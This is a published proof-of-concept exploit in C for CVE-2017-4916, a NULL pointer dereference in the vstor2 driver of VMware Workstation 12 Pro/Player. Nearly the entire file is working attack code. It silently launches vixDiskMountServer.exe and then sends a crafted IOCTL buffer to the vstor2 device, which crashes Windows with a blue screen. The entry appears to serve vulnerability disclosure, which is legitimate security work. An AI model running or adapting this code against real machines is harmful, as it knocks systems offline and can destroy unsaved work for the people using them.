VMware Workstation 12 Pro - Denial of Service
Source: @BorjaMerino  Author: Merino  Published: 2017-06-09
/*
 * Title: NULL pointer dereference vulnerability in vstor2 driver (VMware Workstation Pro/Player)
 * CVE: 2017-4916 (VMSA-2017-0009)
 * Author: Borja Merino (@BorjaMerino)
 * Date: May 18, 2017
 * Tested on: Windows 10 Pro and Windows 7 Pro (SP1) with VMware® Workstation 12 Pro (12.5.5 build-5234757)
 * Affected: VMware Workstation Pro/Player 12.x
 * Description: This p0c produces a BSOD by sending a specific IOCTL code to the vstor2_mntapi20_shared device
 * driver due to a double call to IofCompleteRequest (generating a MULTIPLE_IRP_COMPLETE_REQUESTS bug check)
*/
 
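#include <windows.h>
#include <stdio.h>

/* Opens the vstor2 device and sends the IOCTL named in the description above. */
void ioctl_crash(void)
{
    HANDLE hfile;
    const WCHAR *vstore = L"\\\\.\\vstor2-mntapi20-shared";
    DWORD dummy;
    char reply[0x3FDC];
    char buf[384] = "\x80\x01\x00\x00\xc8\xdc\x00\x00\xba\xab";

    hfile = CreateFileW(vstore, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
    if (hfile == INVALID_HANDLE_VALUE) {
        /* Device not present (driver not loaded or vixDiskMountServer.exe not running) */
        fprintf(stderr, "CreateFileW failed: %lu\n", GetLastError());
        return;
    }
    DeviceIoControl(hfile, 0x2a002c, buf, 382, reply, sizeof(reply), &dummy, NULL);
    CloseHandle(hfile);
}

/* Starts vixDiskMountServer.exe hidden so that the device is available. */
void run_vix(void)
{
    STARTUPINFOW si;
    PROCESS_INFORMATION pi;
    RtlZeroMemory(&si, sizeof(si));
    RtlZeroMemory(&pi, sizeof(pi));
    si.cb = sizeof(si); /* required by CreateProcess */
    si.dwFlags |= STARTF_USESHOWWINDOW;
    si.wShowWindow = SW_HIDE;
    if (CreateProcessW(L"C:\\Program Files (x86)\\VMware\\VMware Workstation\\vixDiskMountServer.exe", NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi)) {
        /* The handles are not needed afterwards */
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
}

int main(void)
{
    run_vix(); /* Comment this if vixDiskMountServer.exe is already running */
    ioctl_crash();
    return 0;
}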
 